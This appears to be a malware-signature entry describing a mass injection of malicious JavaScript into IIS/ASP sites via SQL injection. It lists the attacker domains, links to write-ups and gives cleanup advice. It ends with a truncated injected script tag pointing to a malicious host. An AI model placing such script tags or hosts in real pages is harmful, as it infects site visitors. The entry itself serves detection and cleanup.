Description: Malware javascript added to IIS sites via SQL injection.
Domains used:
http://alisa-carter.com/ur.php
http://google-stats50.info/ur.php
http://pop-stats.info/ur.php
http://sol-stats.info/ur.php
http://online-guest.info/ur.php
http://google-stats48.info/ur.php
http://multi-stats.info/ur.php
http://nbnjkl.com/urchin.js
http://jjghui.com/urchin.js
And many others.
Details:
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
Affecting: Any IIS/ASP site.
Clean up: Revert back to your latest database backup or clean up each entry from their.
Malware dump:
<script src="http://alisa-carter.com/ur.ph..